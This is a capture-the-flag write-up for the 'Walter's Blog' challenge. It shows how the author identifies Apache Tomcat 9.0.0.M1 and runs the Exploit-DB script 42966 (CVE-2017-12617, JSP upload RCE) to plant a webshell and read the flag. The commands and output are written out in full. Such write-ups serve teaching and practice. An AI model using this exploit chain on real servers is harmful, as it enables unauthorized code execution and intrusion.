Writeup DGA - CTF - Walter's Blog

This article describes my solution for the 100-point challenge called “Walter’s Blog”.

Introduction

Un ancien stagiaire avait développé ce site web il y a plusieurs années.
Malheureusement, ce projet a mal été documenté et nous ne retrouvons plus les accès pour l'administrer...

Votre tuteur vous autorise à tout essayer pour récupérer les accès à ce service, soyez inventif !

Le flag est situé dans le fichier /flag.txt.

Mise à jour: Ne mettez pas flag{} pour valider l'épreuve.

Start

We have a Minecraft blog with photos related to this game. By the way, who still plays this game? We know that the flag is located in the /flag.txt file. This means that we need to access the filesystem.

At the very bottom of the home page, there is a link that takes us to the route /contact.html, it’s a contact form. As soon as this form is submitted, an error message appears. There is a 404 Not Found error on the route /contact, the version of the Tomcat server is displayed: Apache Tomcat/9.0.0.M1.

All that remains to do is to find an exploit for this version of the Tomcat server.

Exploitation

We can use searchsploit to find an exploit. Having tried several exploits without success, I only show the one we are interested in.

searchsploit tomcat
[...]
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
[...]

The id of this exploit is 42966. We can use the -m flag to copy this script.

searchsploit -m 42966
  Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
      URL: https://www.exploit-db.com/exploits/42966
     Path: /usr/share/exploitdb/exploits/jsp/webapps/42966.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/ap/42966.py

Looking at the code, I notice that it’s written in Python 2, I’m in Python 3 on my machine so to avoid making a mess I created a virtual environment.

virtualenv2 pwn
created virtual environment CPython2.7.18.final.0-64 in 208ms
  creator CPython2Posix(dest=/home/ap/pwn, clear=False, global=False)
  seeder FromAppData(download=False, pip=bundle, wheel=bundle, setuptools=bundle, via=copy, app_data_dir=/home/ap/.local/share/virtualenv)
    added seed packages: pip==20.2.4, setuptools==44.1.1, wheel==0.35.1
  activators PythonActivator,CShellActivator,FishActivator,PowerShellActivator,BashActivator
cd pwn/
source bin/activate.fish
(pwn) mv ../42966.py .
(pwn) python -V
Python 2.7.18

We can now try to run the script.

(pwn) python 42966.py
Traceback (most recent call last):
  File "42966.py", line 2, in <module>
    import requests
ImportError: No module named requests

The module requests is not found, it has to be installed.

(pwn) pip install requests
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting requests
  Using cached requests-2.25.0-py2.py3-none-any.whl (61 kB)
Collecting certifi>=2017.4.17
  Using cached certifi-2020.11.8-py2.py3-none-any.whl (155 kB)
Collecting chardet<4,>=3.0.2
  Using cached chardet-3.0.4-py2.py3-none-any.whl (133 kB)
Collecting urllib3<1.27,>=1.21.1
  Using cached urllib3-1.26.2-py2.py3-none-any.whl (136 kB)
Collecting idna<3,>=2.5
  Using cached idna-2.10-py2.py3-none-any.whl (58 kB)
Installing collected packages: certifi, chardet, urllib3, idna, requests
Successfully installed certifi-2020.11.8 chardet-3.0.4 idna-2.10 requests-2.25.0 urllib3-1.26.2
WARNING: You are using pip version 20.2.4; however, version 20.3 is available.
You should consider upgrading via the '/home/ap/pwn/bin/python -m pip install --upgrade pip' command.

It’s quite better now.

(pwn) python 42966.py --help
Usage:


   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/




./cve-2017-12617.py [options]

options:

-u ,--url [::] check target url if it's vulnerable
-p,--pwn  [::] generate webshell and upload it
-l,--list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt


[@intx0x80]



Options:
  -h, --help      show this help message and exit
  -u U, --url=U   Website Url
  -p P, --pwn=P   generate webshell and upload it
  -l L, --list=L  hosts File

Reading the help, we understand that the script should be used in the following way.

(pwn) python 42966.py -u http://waltersblog3.chall.malicecyber.com/ -p pwn



   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
 | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
 | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
 | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/



[@intx0x80]


Uploading Webshell .....
$

We have a shell! So let’s display the flag.txt file.

$ cat flag.txt
flag{i4lW4y5UpD4T3Y0urt0mC@}

We managed to access the filesystem and retrieve the flag to validate this challenge.